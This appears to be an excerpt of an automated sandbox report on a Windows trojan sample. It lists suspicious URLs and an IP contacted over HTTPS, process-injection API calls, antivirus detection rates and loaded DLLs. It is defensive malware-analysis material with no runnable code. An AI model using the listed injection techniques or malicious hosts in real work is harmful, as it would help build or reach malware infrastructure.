Source: 6BE4RDldhw.exe, 00000000.00000003.2434006872.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2475345569.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2580778228.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.0000000000917000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgiP
Source: 6BE4RDldhw.exe, 00000000.00000002.2598024798.00000000206F3000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2047547102.00000000008BA000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2261026230.000000000092F000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1961227445.0000000000928000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2089947021.000000000092B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2345256582.000000000093C000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2433861488.00000000206F3000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1475992472.0000000000922000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2176965259.000000000093E000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1394988770.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1520540319.00000000008BA000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1914704829.000000000093A000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2580778228.000000000092B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.00000000008BA000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2475288001.000000000092F000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1827529061.00000000206D1000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2176461994.00000000008BA000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521010683.0000000000931000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2345346508.000000000092B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2597281272.000000001FAC6000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.veeble.org/contact/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50042 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49906 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 50039 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49969 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown	Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49955 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50052 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49936
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49931
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49930
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 49925 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49936 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50030
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49925
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50039
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50019 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49982 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49919
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49918
Source: unknown	Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49912
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown	Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50042
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50046
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown	Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50030 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50052
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50051
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49906
Source: unknown	Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49901
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987

Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49793 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49819 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49832 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49845 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49858 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49870 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49883 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49896 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49908 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49919 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49931 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49943 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49956 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49969 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49982 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49994 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:50007 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:50019 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:50031 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:50042 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:50052 version: TLS 1.2

Source: Yara match

File source: Process Memory Space: 6BE4RDldhw.exe PID: 7796, type: MEMORYSTR

Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Code function: 0_2_02E87D80 NtWriteVirtualMemory,	0_2_02E87D80
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Code function: 0_2_02E8DD6C RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	0_2_02E8DD6C
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Code function: 0_2_02E8DBAC RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	0_2_02E8DBAC
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Code function: 0_2_02E8DC88 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	0_2_02E8DC88
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Code function: 0_2_02E8DC00 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	0_2_02E8DC00
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Code function: 0_2_02E88D6A GetThreadContext,SetThreadContext,NtResumeThread,	0_2_02E88D6A
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Code function: 0_2_02E88D6C GetThreadContext,SetThreadContext,NtResumeThread,	0_2_02E88D6C

Source: C:\Users\user\Desktop\6BE4RDldhw.exe

Code function: 0_2_02E8F7C4 InetIsOffline,CoInitialize,CoUninitialize,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,

0_2_02E8F7C4

Source: C:\Users\user\Desktop\6BE4RDldhw.exe

Code function: 0_2_02E720C4

0_2_02E720C4

Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Code function: String function: 02E744DC appears 75 times
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Code function: String function: 02E74500 appears 33 times
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Code function: String function: 02E74860 appears 949 times
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Code function: String function: 02E746D4 appears 244 times
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Code function: String function: 02E889D8 appears 45 times
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Code function: String function: 02E88954 appears 56 times

Source: 6BE4RDldhw.exe	Binary or memory string: OriginalFilename vs 6BE4RDldhw.exe
Source: 6BE4RDldhw.exe, 00000000.00000003.1333431137.0000000002CDA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs 6BE4RDldhw.exe
Source: 6BE4RDldhw.exe, 00000000.00000002.2583380707.0000000002CCF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs 6BE4RDldhw.exe
Source: 6BE4RDldhw.exe, 00000000.00000002.2598433621.000000007FA30000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs 6BE4RDldhw.exe
Source: 6BE4RDldhw.exe, 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs 6BE4RDldhw.exe
Source: 6BE4RDldhw.exe, 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs 6BE4RDldhw.exe
Source: 6BE4RDldhw.exe, 00000000.00000002.2583380707.0000000002CD3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs 6BE4RDldhw.exe
Source: 6BE4RDldhw.exe, 00000000.00000003.1333431137.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs 6BE4RDldhw.exe
Source: 6BE4RDldhw.exe, 00000000.00000003.1333153403.000000007FC5F000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs 6BE4RDldhw.exe
Source: 6BE4RDldhw.exe, 00000000.00000002.2582071460.0000000002415000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs 6BE4RDldhw.exe
Source: 6BE4RDldhw.exe, 00000000.00000003.1333810883.000000007F8EF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs 6BE4RDldhw.exe
Source: 6BE4RDldhw.exe, 00000000.00000003.1333810883.000000007F8EF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs 6BE4RDldhw.exe

Source: 6BE4RDldhw.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@1/1

Source: C:\Users\user\Desktop\6BE4RDldhw.exe

Code function: 0_2_02E77FDC GetDiskFreeSpaceA,

0_2_02E77FDC

Source: C:\Users\user\Desktop\6BE4RDldhw.exe

Code function: 0_2_02E86DD0 CoCreateInstance,

0_2_02E86DD0

Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior

Source: C:\Users\user\Desktop\6BE4RDldhw.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 6BE4RDldhw.exe	ReversingLabs: Detection: 65%
Source: 6BE4RDldhw.exe	Virustotal: Detection: 67%

Source: C:\Users\user\Desktop\6BE4RDldhw.exe

File read: C:\Users\user\Desktop\6BE4RDldhw.exe

Jump to behavior

Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: url.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6BE4RDldhw.exe	Section loaded: amsi.dll	Jump to behavior
